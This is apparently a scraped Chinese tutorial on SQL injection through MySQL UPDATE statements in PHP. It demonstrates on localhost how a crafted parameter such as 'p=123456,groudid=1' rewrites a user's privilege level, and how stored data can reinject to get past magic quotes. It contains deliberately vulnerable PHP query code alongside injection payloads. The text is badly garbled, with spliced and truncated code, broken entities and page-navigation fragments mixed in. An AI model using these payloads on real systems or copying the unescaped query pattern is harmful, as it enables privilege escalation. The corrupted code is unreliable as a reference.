UPDATE注射(mysql php)的两个模式.docVIP

　　UPDATE注射(mysql+php)的两个模式～教育资源库 　　一.测试环境： 　　OS:yISAMDEFAULTCHARSET=latin1; 　　-- 　　--导出表中的数据`userinfo` 　　-- 　　INSERTINTO`userinfo`VALUES(2,heige,123456); 　　------end------- 　　三.测试模式： 　　1,变量没有带或[MOD1] 　　lt;?php 　　//test1.phpMod1 　　$servername=localhost; 　　$dbusername=root; 　　$dbpasse=test; 　　mysql_connect($servername,$dbusername,$dbpassysql_db_query($dbname,$sql); 　　$userinfo=mysql_fetch_array($result); 　　echolt;pgt;SQLQuery:$sqllt;pgt;; 　　?gt; 　　脚本里只是修改user=heige的pass，如果groudid表示用户的权限等级，我们的目的就是通过构造$p来达 　　到修改groupid的目的： 　　那么我们提交：127.0.0.1/test1.php?p=123456,groudid=1 　　在mysql里查询： mysqlgt;select*fromuserinfo; 　　+---------+-------+--------+ 　　|groudid|user　|pass　| 　　+---------+-------+--------+ 　　|1　　　|heige|123456| 　　+---------+-------+--------+ 　　1roe=localhost; 　　$dbusername=root; 　　$dbpasse=test; 　　mysql_connect($servername,$dbusername,$dbpassword)ordie(数据库连接失败); 　　$sql=updateuserinfosetpass=$pwhereuser=heige;//lt;--$P使 123下一页 友情提醒：，特别！用单引号 　　$result=mysql_db_query($dbname,$sql); 　　$userinfo=mysql_fetch_array($result); 　　echolt;pgt;SQLQuery:$sqllt;pgt;; 　　?gt; 　　为了关闭我们构造$p应该为123456,groudid=2提交： 　　127.0.0.1/test2.php?p=123456,groudid=1在gpc=on的情况下变成了\ 　　提交的语句变成：SQLQuery:updateuserinfosetpass=123456\,groudid=\1ysql查询： mysqlgt;select*fromuserinfo; 　　+---------+-------+--------------------+ 　　|groudid|user　|pass　　　　　　　| 　　+---------+-------+--------------------+ 　　|2　　　|heige|123456,groudid=1| 　　+---------+-------+--------------------+ 　　1roe=localhost; 　　$dbusername=root; 　　$dbpasse=test; 　　mysql_connect($servername,$dbusername,$dbpassysql_db_query($dbname,$sql); 　　mysql_fetch_array($result);　　//$p的数据写入数据库 　　$sql=selectpassfromuserinfoysql_db_query($dbname,$sql); 　　$userinfo=mysql_fetch_array($result); 　　echo$userinfo[0];　//把pass查询输出给$userinfo[0] 　　$sql=updateuserinfosetpass=$userinfo[0]ysql_db_query($dbname,$sql); 　　mysql_fetch_array($result);//把$userinfo[0]再次update 　　?gt; 　　我们测试下，提交：127.0.0.1/test3.php?p=123456,groudid=1 　　回mysql查询下： mysqlgt;